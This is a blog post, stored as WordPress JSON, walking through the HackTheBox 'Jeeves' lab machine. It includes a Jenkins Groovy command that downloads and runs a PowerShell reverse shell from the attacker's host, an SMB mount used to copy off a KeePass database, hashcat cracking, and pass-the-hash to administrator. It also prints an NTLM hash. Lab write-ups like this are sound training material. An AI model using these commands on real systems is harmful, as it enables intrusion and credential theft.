{"id":59,"date":"2020-05-07T16:29:15","date_gmt":"2020-05-07T16:29:15","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=59"},"modified":"2020-05-07T17:46:25","modified_gmt":"2020-05-07T17:46:25","slug":"jeeves-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/jeeves-hackthebox-walkthrough\/","title":{"rendered":"Jeeves : Hackthebox walkthrough"},"content":{"rendered":"\n<p class=\"has-drop-cap\">Hey fellow Hackthebox users!! This is Shreya Pohekar. This blog post is gonna walk you through Jeeves that\u2019s a medium windows machine.<\/p>\n\n\n\n<p>The initial foothold on the box is based upon the unauthenticated Remote code execution on the jenkins. The key is just to find the right direcotry to hit. Once inside the box, there is a keepass database stored somewhere. Decrypt the master key for the database and you will be one step close to become nt authority!<\/p>\n\n\n\n<p>With all that being said, lets hack the box!<\/p>\n\n\n\n<p>Run the nmap scan for open ports and services.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># namp -sC -sV -oA jeeves.nmap 10.10.10.63<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/FcA97NJyZaJq0EmMgixMGLFPHb1xPTLE47WZAjcLEqGgDVhc3xVRM_VS-MvLvRUCmmSK4OkW5GfzL7oHzwABVhpDKN9BE7vGuuKzs7VGtueGoASqP0iBzcoZQZj8Gb6UfsWxurdg\" alt=\"\"\/><\/figure>\n\n\n\n<p>So there were 2 ports where http was open. I checked out both of them.<\/p>\n\n\n\n<p><a href=\"http:\/\/10.10.10.63\">http:\/\/10.10.10.63<\/a> showed up something like this.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/PGg8__MgsEOmvdQKzpj6468igaHe9nG0WLAcUFKuNRxz47k3I8r_ztwFmiI2vIhuoQffF6g0ywGUWmLjtVY1rOJM8kexoZsTHv51SNZJ_8Ku4GlGyjLTlf3Pkibx_544gtlss47H\" alt=\"\"\/><\/figure>\n\n\n\n<p>The searchbar too was dummy. On a click of search it showed up an error that was loading an image file. I got to know the thing by viewing the page source.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/S0OG_rgEgcsPVSVo-1dy_Op7fZ5C89oTBFfvpcPSUreFuyunew2Om2OeOFQkS0L3TrAjN-d0zL1-0339g-K-1dD8MTessp10FOJxA_BZ2EacMG7lA8EyTAJmnsXQILrRbFNIi2V-\" alt=\"\"\/><\/figure>\n\n\n\n<p>This is actually using an image <b>JEEVES.png<\/b><\/p>\n\n\n\n<p>So moving further, I checked up on <a href=\"https:\/\/10.10.10.63:50000\">https:\/\/10.10.10.63:50000<\/a> A page showed up giving reference to Jetty 9.4.z-SNAPSHOT.&nbsp; <br>\nI search this term for exploits and found out an unauthenticated RCE and directory traversal.But none of them worked out.<\/p>\n\n\n\n<p>So I spawned&nbsp; up the gobuster scan on both the URLs and got some luck with <a href=\"http:\/\/10.10.10.63:50000\">http:\/\/10.10.10.63:50000<\/a>&nbsp;<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u http:\/\/10.10.10.63:50000 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 50 -o gobuster<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/jPz09Wt-yUWieY_mYxUsVZsrJyn-AAQX3rcYNp_LtO3Je32hY1x2aqN4tllFHBO__xfowFb-h-SpU48AIIwBcTmKhsWxdeiqaLlPKoXHRvWPLCRXrZTfseAsfUlnJfgUdAnZ0iGk\" alt=\"\"\/><\/figure>\n\n\n\n<p>A page opened up\u2026.So it looks like there is Jenkins installed over here.Jenkins is an open source automation tool written in Java with plugins built for Continuous Integration. We can automate building projects, running tests, doing static code analysis, and deploment using jenkins.To know more about jenkins, visit <a href=\"https:\/\/www.infoworld.com\/article\/3239666\/what-is-jenkins-the-ci-server-explained.html\">here<\/a><\/p>\n\n\n\n<p>I started to search for jenkins RCE exploits. And luckily, I dwelled upon this blog <a href=\"https:\/\/www.hackingarticles.in\/exploiting-jenkins-groovy-script-console-in-multiple-ways\/\">here<\/a> that perfectly served the purpose. In a nutshell, If the user has access to the script console under <b>Manage Jenkins<\/b>, he can execute commands without restrictions to get a reverse shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/Tp9klxt4D06o1m8K1wYpfMTAWO1mD4amyHtxI6PL-usB8v7isv1BKQXWL6cW7jy4aV8t2m2so--hNrWzniX1BUapNMgLglOEbdXeoaLt2pEFkfTpnjnvqo-Ch-DvZAQVOfoTEpyd\" alt=\"\"\/><\/figure>\n\n\n\n<p>Paste the code given below in the script console. Open up a netcat listener on port you specified in the script. In my case, its 1234.  Also grab the <strong>Invoke-PowerShellTcp.ps1<\/strong> from <a href=\"https:\/\/github.com\/samratashok\/nishang\/blob\/master\/Shells\/Invoke-PowerShellTcp.ps1\">here<\/a> and set up a web server using the python&#8217;s SimpleHTTPServer.Upon shell code execution,you will directly get a powershell.<\/p>\n\n\n\n<p>Add a line to the end of Invoke-PowerShellTcp.ps1. Here 10.10.14.9 is your local machine&#8217;s IP.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 1234<\/pre>\n\n\n\n<p class=\"wpf-blue-background\"># nc -lvnp 1234 <br> # python -m SimpleHTTPServer 80<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">cmd = \"\"\" powershell \"IEX(New-Object Net.WebClient).downloadString('http:\/\/10.10.14.9\/Invoke-PowerShellTcp.ps1')\" \"\"\"\nprintln cmd.execute().test\n<\/pre>\n\n\n\n<p>As the script gets executed on script console, we get a shell and we are now jeeves\\kohsuke. The user has an user.txt in his Desktop folder. Got get\u2019em.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/GFYagUcQNbzGHYF7JcgZwJtM_6NKE5YE9XnR5h5eFsINBij3i0Pm_DY8Yu7i1uhzL94tG-vGfoRjECvY0kqIhS6ShXJ9-xIh1y_lUHo9lFybUxEVtCenqZ282Rz9gb3bnVoe8YOE\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/RaqXeTUXWxzNyfHD1scl55kBwA9ihnE6SHdpIBE_lohnNEv3flP7zcvJbrnq3Wjbyt4J_9yTkOufLTFbec7HMnl6F2cDjOKUzIjoleijjPbY-9_a1ir2DyhekOgZZgBx-h8lo7XV\" alt=\"\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">So time for Privelege Escalation!!<\/h2>\n\n\n\n<p>When I got the initial foothold, I was inside \/Administrator\/.jenkins and a lot of seemingly juicy information was a bit misleading. Because, a lot of master-key, secret keys were present in a readable format. There had to be something else. And I found it under C:\/Users\/kohsuke\/Documents<\/p>\n\n\n\n<p><strong>CEH.kdbx<\/strong><\/p>\n\n\n\n<p>The extension of the file represented it to be a<strong> keepass database<\/strong> file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/glLyFjjxL81N47TTIKdQTNsMDhPxN-nzWfy_l_QRgq8MgNc4xrE1aYMNmi8PoHwPo33wDao9cj7bj9-PJ4CBFZ1wxDsqhnC8HdYpppf3ItS12baeABNKQbt8_cTUJ5PL5zhOlNS7\" alt=\"\"\/><\/figure>\n\n\n\n<p>I downloaded the file on the local machine to crack the master key of the file. So set up a smbserver to download the files (As this port was open on the windows box).<br>\nSet up a smb share on the local machine with <a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/smbserver.py\">Impacket&#8217;s Smbserver.py<\/a><br>\n<b>SHARE<\/b> is the name of the share and <b>`pwd`<\/b> defined that the contents of the present working directory are being hosted via smb.<br>\nAfter hosting the directory contents, we can create a temporary PowerShell drive that&#8217;s mapped to a network share(SHARE) using <b>new-PSDrive<\/b> cmdlet. The PSProvider specifies the Pwershell Filesystem provider. The Root parameter specifies the network share&#8217;s UNC path. <\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># smbserver.py SHARE `pwd` <br> # new-PSDrive -Name \u201cshreya\u201d -PSProvider \u201cFileSystem\u201d -Root \u201c\\\\10.10.14.9\\SHARE\u201d<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/v1w6lbCpahxEoUR5kFDZ_dXCQfkm0hDkMkoxwYaxwXX_tgjmLjGOqKRQAhAgHBWbjKLmpuEE3zaoAquvohU19GnAq3Smshl0MYY4yz8YqkiNAQ3ovfTRQGUMkIGlFJLEzDDY3pfF\" alt=\"\"\/><\/figure>\n\n\n\n<p>The share is now mounted and can be accessed by typing<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; cd shreya:<\/pre>\n\n\n\n<p>Download the .kdbx file using<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; cp C:\\Users\\kohsuke\\Documents\\CEH.kdbx<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/sCy7RMZXKq4J7XzWV1X9GyfIe2iFvxwqxjjjcqzGdf4dqQpmqDU5mCWaQSrKUjW6KdomIUx-yOCDs6qibCdrnvqJOv9H25pXpG1z7xMQCKoRV3AZCYJE3SIp5J1YIrcGwBTMrXvx\" alt=\"\"\/><\/figure>\n\n\n\n<p>Then I converted the file to a crackable hash using keepass2john<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/nnj-np4v03JGaT8fM9sOcvn_5mfmUddGtwJp3G66jEzFuOk6kttdzTUsKhpwYM4bNPapz3TZJtI9zz-xa1RIsMmAQkPAn4yvuLIOc0fxv0rzSMaVa5dip5Oxmel54u9F4OWnCGX5\" alt=\"\"\/><\/figure>\n\n\n\n<p>Looking at the hashformat, I googled hashcat exasmple hashes and found 4 possible results. Mode 13400 looked similar to what we obtained.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/lf1jmD6w7_gbs5mX0pxHCeuDXAga_vsWhyp-u3TPx7Ea32X0hSi7ubb8OY658v0IcX2vXjLxMuKKAeiZGSyAOyy91opyQ0aXYfflqa30PlzTm3v1dmxV3scnSQJ2jAGmKPkX3xAu\" alt=\"\"\/><\/figure>\n\n\n\n<p>So I ran the hashcat on the retrieved password hash.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># hashcat -m 13400 pass_hash \/usr\/share\/wordlists\/rockyou.txt --force<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/yj4PpjlWPc27HjwM3hGuFlCZqqOVwIX_wN35OG_VI_uSTSytMYqpN_0DOelKq_5R9frmlg4FU2nyPrudvCDmzHLkIlgzzXzgrTi_w4N9Z0XH7XAPwIFrCBYOZ1p47QoN0ghTmVnK\" alt=\"\"\/><\/figure>\n\n\n\n<p>Kudos! It cracked.<\/p>\n\n\n\n<p>Now we want keepass software to open the file.<br> If you dont have keepass installed install it with:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># apt install keepass2<\/pre>\n\n\n\n<p>After loading the db file, it will look like this. There were a bunch of passwords available.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/DBmMXdEmiQl3iIS_2eR7jiw5nzYEh3dOtJvD077_jb6qpleOOerQfJ8BXRxVZUAaXiBS6wZbXJaSm6OFvNEDsX3RmLbxZQRhckf9-2QDjPa_-FfIUDHG6hYHWiB2GKKrPNVVxd_X\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/oMGUsuOb30bJkNCd09LwO9fK1KBBEJgI4Qe23VGGeZfrsyxdNPj0KlS8IxH35u9ge9ktB052EwneuZWE36M87R2hEMhb-0a1N64HkDqJd5fdELcf4HB2smZqLeB_noD3tvA4Ck0e\" alt=\"\"\/><\/figure>\n\n\n\n<p>One of which was an NTLM hash. This was something interesting.<\/p>\n\n\n\n<p class=\"wpf-blue-background\">Aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 (NTLM HASH)<\/p>\n\n\n\n<p>With the different passwords obtained, I tried to bruteforce the creds for administrator using Impacket scripts such as winexe, psexec, smbexec but had no luck.<\/p>\n\n\n\n<p>Since i had the NTLM hash, I tried pth-winexe to get hold of administrator. And guess what?! I was right<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/qFH3iRoxoDUnTTzkUQWw4272UiZovgPMce9F8aJH_JJLDYeJTeByyjsd8GtzG_U7DrfLf_h0fCf7bQS_CiQGcb29tnSxRHitdXrLOzdWCHGOI18OAVMPnjbdoIeAflHnwpZFFZDQ\" alt=\"\"\/><\/figure>\n\n\n\n<p>I listed the contents of Administrator\u2019s Desktop and got a file hm.txt .So where the hell is root.txt?!!<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/BECAThV6l16sWXDVAgxpMiFS5KGXICxXriPaUyN-do2hS8Jqch8LvVS9bAFcS7tRykM2TptE2HPIXMVZJH8wqvwVwsn6EpSWtSuFUA12AgsmjdbMMNpk_rX8uzI7kJ05eMfh0LZP\" alt=\"\"\/><\/figure>\n\n\n\n<p>I listed its contents<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/dOTdrkAO2sFuB5JM1ilkNfzhLCqr4LbSGRtp-Eu3De9yV6KyQPfE0VtVYa9CYFEJ3kv8OVK7ByBdwZvdZiJkobSJz9oUq4QlOSRq9fBbZU4svFV2O8TS_6fHzI_-MozfmsApj6HC\" alt=\"\"\/><\/figure>\n\n\n\n<p>It says to look deeper.&nbsp; <br> So i did a recursive scan and found my root.txt as a file inside a file (as a meta data)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/B-96AQ87FBjDW3ypvI4d7U2vi5iuMPmeUBBNoczZK7gnR0OEuPswgrF-TqghDXZLX195ztPclK5glC03sZqKXFYWAtdGuKUD_fu0yOgbBGBQkQAFF2jTG0-CHqv9LJiTPwcuYVJ3\" alt=\"\"\/><\/figure>\n\n\n\n<p>This listing of filename is called <b>Streams<\/b>. Streams contain the data that is written to a file, and gives more information about a file than file attributes and properties. In the above screenshot,  root.txt is the name of the&nbsp;data stream, hm.txt is the file-name and $DATA is the stream type. The contents of stream can be listed with the following command:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; powershell (Get-Content&nbsp; hm.txt -Stream root.txt)<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/WgelDZV2VVpShIX2ZQjclWndyFW7R49f8uTLUqABNtZt9oXkE-9nU7kq-kC1L43P6Xs_kXSoNFOxf1pZ1kPV88PhpmEq7nZqGrKBn_1tpn-alCMq34UXeoCVOJeninLpA4tB4f_W\" alt=\"\"\/><\/figure>\n\n\n\n<p>You can read more about streams <a href=\"https:\/\/blog.malwarebytes.com\/101\/2015\/07\/introduction-to-alternate-data-streams\/\">here<\/a><\/p>\n\n\n\n<p>Thanks for reading!! If you enjoyed reading, let me know in the comments and subscribe to my page.<\/p>\n\n\n\n<p>Until then, Happy Hacking!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hey fellow Hackthebox users!! This is Shreya Pohekar. This blog post is gonna walk you through Jeeves that\u2019s a medium windows machine. The initial foothold on the box is based upon the unauthenticated Remote code execution on the jenkins. The key is just to find the right direcotry to hit. Once inside the box, there [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":108,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[48,51,26,54,46,55,49,47,52,50,53],"class_list":["post-59","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-decrypt-keepass","tag-groovy-scripts","tag-hackthebox","tag-htb","tag-jeeves","tag-jeeves-htb","tag-jenkins","tag-keepass","tag-red-teaming","tag-script-console","tag-windows-pentest","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/59"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=59"}],"version-history":[{"count":11,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/59\/revisions"}],"predecessor-version":[{"id":107,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/59\/revisions\/107"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/108"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=59"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=59"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=59"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}